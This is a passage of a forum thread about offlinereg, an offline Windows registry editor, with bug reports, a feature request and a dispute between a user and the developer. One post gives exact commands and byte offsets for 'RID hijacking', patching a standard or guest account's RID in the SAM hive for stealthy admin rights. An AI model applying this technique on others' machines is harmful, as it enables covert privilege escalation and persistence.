Jump to content











Photo
- - - - -

offlinereg


  • Please log in to reply
292 replies to this topic

#276 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 4 weeks ago

You forgot to fix this one. Leftovers. 
Edit: It seems to work fine. 

 

Also reg.exe cannot be a replacement because it doesn't ignore permissions. 


Edited by osfixer, 4 weeks ago.


#277 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 4 weeks ago

What you could do also is add support for adjusting permissions.. for keys, values. 

This could be done only through command line I think. 

 

Does offlinereg respect inherited user? If process is launched with SYSTEM or TI token?

If it doesn't you can add /inherit switch..

DWORD
ORAPI
ORGetKeySecurity (
_In_ ORHKEY Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_Out_opt_ PSECURITY_DESCRIPTOR pSecurityDescriptor,
_Inout_ PDWORD lpcbSecurityDescriptor
);

DWORD
ORAPI
ORSetKeySecurity (
_In_ ORHKEY Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_In_ PSECURITY_DESCRIPTOR pSecurityDescriptor
);

Edited by osfixer, 4 weeks ago.


#278 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2501 posts
  • Location:Nantes - France
  •  
    France

Posted 3 weeks ago

Following a post here on how to blank an account's password using offlinereg, this time, lets see how to perform "RID hijacking".

The local admin account has a 01F4 rid.
What about "patching" another (non admin) account to replace its RID with 01F4?

rem notice the rid at offset 30h (here E803)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 getvalue f

rem lets write f401 (admin rid) at offset 30h (48 in decimal form)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 244 48
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 1 49

Now you should be able to restart your system, log in with this user account and actually perform admin task.
This is quite "stealthy" as the account will still not be part of the local admin group while being able to perform admin tasks.

LSASS trust SAMSRV and SAMSRV trust the registry : everyone is happy...

This can work with the guest account as well.

I tested this with success from a winpe against windows 10.



#279 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14707 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 3 weeks ago

This can work with the guest account as well.


Nice :)

And once again all it can be used to prevent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, before or later").

:duff:
Wonko

 

[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it



#280 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2501 posts
  • Location:Nantes - France
  •  
    France

Posted 3 weeks ago

Nice :)

And once again all it can be used to preent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, before or later").

:duff:
Wonko

 

[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it

 

Absolutely agree.

 

Bios is a bit extreme in a corporate environement as you cannot ask users to remember/type the bios password but is perfectly valid in a home environement.

 

Disk encryption like bitlocker adresses a lot of these "local" attacks although I feel bitlocker could shortly be broken without even having to get the key from the TPM chip...



#281 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14707 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 3 weeks ago

Bios is a bit extreme in a corporate environement as you cannot ask users to remember/type this password but is perfectly valid in a home environement.

 

I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.

 

:duff:

Wonko

 

[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services

[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.



#282 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2501 posts
  • Location:Nantes - France
  •  
    France

Posted 3 weeks ago

I don't see how you can ask an user to remember his Windows login password[1] but not the BIOS one in a corporate environment.

 

:duff:

Wonko

 

[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services

[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.

 

I work in a big corp environement and it is alreay a PITA to enforce usernames which are vaguely connected to the actual user name (x letters for country code, x letters for division, x letters for first names, x letters for last name, etc ) thus witnessing regularly users who forget their username because it is so cryptic.

And then a 8+ password characters which has to include digits AND non alpha num chars with a policy preventing the use of  the last 16 passwords...

 

That only is enough to keep dozens ot IT ppl busy every day :)

I can see the massive nervous breakdown it would be if we were to ask to remember the computer BIOS password.

 

Now, on a good side, in big corp environements, SSO/delegation makes is so that the user normally should only have to remember his unique LDAP credentials - with one major pitfall thus : if the user credentials gets compromised, all apps get compromised...

 

Security is a never ending discussion.

I like to play the red team sec guy - I really would not want to be a blue team sec guy :)



#283 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14707 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 3 weeks ago

That only is enough to keep dozens ot IT ppl busy every day  :)

 

I guess we have a different idea of what busy means (or maybe you have much better IT ppl than I ever met):

Usual activities of IT people I know:

1) Saying NO, it is NOT possible to whatever request

2) In a few cases say Yes, it is possible but we need six months time and hire an external programmer.

3) In all other cases do something (usually trivial) and make it seem like it is:

a. difficult

b. possibly very, very difficult

c. even better, very, very difficult AND tiring

 

:duff:

Wonko



#284 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2501 posts
  • Location:Nantes - France
  •  
    France

Posted 3 weeks ago

I guess we have a different idea of what busy means (or maybe you have much better IT ppl than I ever met):

...

 

Sounds like you have had bad experiences with IT departments :)

 

Running an IT dpt, I have a difference experience.

A good dpt will be organised in different levels using ITIL processes and based on a service catalog with SLA's : 

-level 1 facing users with one task : solve the issue/address the request in less than 30 mns max with an objective of 60% of all tickets solved in L1

-level 2 specialised in different fields (networks, systems, etc) mainly focusing on more complex requests with an objective of 30% of all tickets solved in L2

-level 3 specialised in a field (network for example) AND a platform/solution (checkpoint/fortigate/etc) liaising with vendors/editors if it really needs

to

 

Each team needs to cascade proper documentation/delegation to other teams to ensure each team can deal with incidents/requests in a timely and efficient maneeer.

 

Now I am more into IT Ops and I appreciate that adressing new needs, specially around Apps, is quite different and possibly deals more with project management.

 

My wife works in a big company as well, is a user, not an IT person, and basically has the same feedback as you do which lead to nice discussions :)

 

Now, may be we deviated a bit from the original post: after all, this is only a few bytes updated in a file sitting on the local drive  :lol:



#285 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14707 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 3 weeks ago

My wife works in a big company as well, is a user, not an IT person, and basically has the same feedback as you do which lead to nice discussions  :)

 

So you have two separate but concurrent reports by two people that - for different reasons - are by definition always right ;).

 

Your particular IT department   :worship:  is then definitely the exception that confirms the rule. 

 

 

Now, may be we deviated a bit from the original post: after all, this is only a few bytes updated in a file sitting on the local drive   :lol:

Agreed :)

 

:duff:

Wonko



#286 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 2 weeks ago

Found another bug. IMHO reg load/unload is way more reliable..
I've lost hope in this tool. Too many bugs.

offlinereg-win64 "H:\Windows\System32\config\SYSTEM" " " import secpol.reg

[ControlSet001\Control\SecurePipeServers\Winreg\AllowedExactPaths]
main error:Access violation
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurePipeServers\Winreg\AllowedExactPaths]
"Machine"="" ; Network access: Remotely accessible registry paths (None).

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurePipeServers\Winreg\AllowedPaths]
"Machine"="" ; Network access: Remotely accessible registry paths and subpaths (None).

Edited by osfixer, 2 weeks ago.


#287 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2501 posts
  • Location:Nantes - France
  •  
    France

Posted 2 weeks ago

 

Found another bug. IMHO reg load/unload is way more reliable..
I've lost hope in this tool. Too many bugs.

 

Good news for you is that you dont have to use it : life is good ! :)

It is not as if I had not warned you several times that i have put little efforts in the import command and thay you should prefer reg load/unload for this specific matter...



#288 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 2 weeks ago

So you are intentionally not fixing bugs? That is really weird.



#289 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2501 posts
  • Location:Nantes - France
  •  
    France

Posted 2 weeks ago

So you are intentionally not fixing bugs? That is really weird.

 

Not exactly.

I am intentionally defining my priorities.

Nothing wierd there : I believe all human beings do so.



#290 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 2 weeks ago

That is a bad excuse, telling people not to use your tool.

But then again I am not surprised considering..


Edited by osfixer, 2 weeks ago.


#291 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 2501 posts
  • Location:Nantes - France
  •  
    France

Posted 2 weeks ago

That is a bad excuse, telling people not to use your tool.

But then again I am not surprised considering..

 

Lets stop the discussion there.

You dont like the tool? You know of other tools? All fine with me.

 

I am not asking for any credits but at the same time will not accept negative comments not will try to decrypt your under statements.

 

You have been gently warned.

Dont spoil my fun.



#292 osfixer

osfixer

    Member

  • Validating
  • 35 posts
  •  
    United Kingdom

Posted 2 weeks ago

Instead of saying thanks for discovering your bugs in your software, you are
now saying sorry can't do. Heh.



#293 darren rose

darren rose

    Frequent Member

  • Advanced user
  • 438 posts
  • Location:Norwich, Norfolk
  •  
    United Kingdom

Posted 2 weeks ago

@osfixer - I really don't know what your problem is or why you are giving erwan.l attitude.  He creates tools for us to use for free out of kindness, he has a job to do like all of us, so can only devote limited time to these projects.  Why not just be grateful for what he does.  If it doesn't do what you want then use something else.  All of us here on this forum appreciates the work others do, and understand it is a hobby or side projects, we don't demand fixes and then get stroppy when we don't like answers. Perhaps take your attitude elsewhere

 

@erwan.l - I personally thank you for all you do, and use some of your tools such as this which work well for me, I have always found you helpful and friendly, so just ignore comments from idiots like this who have no respect for the free tools you provide us with






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users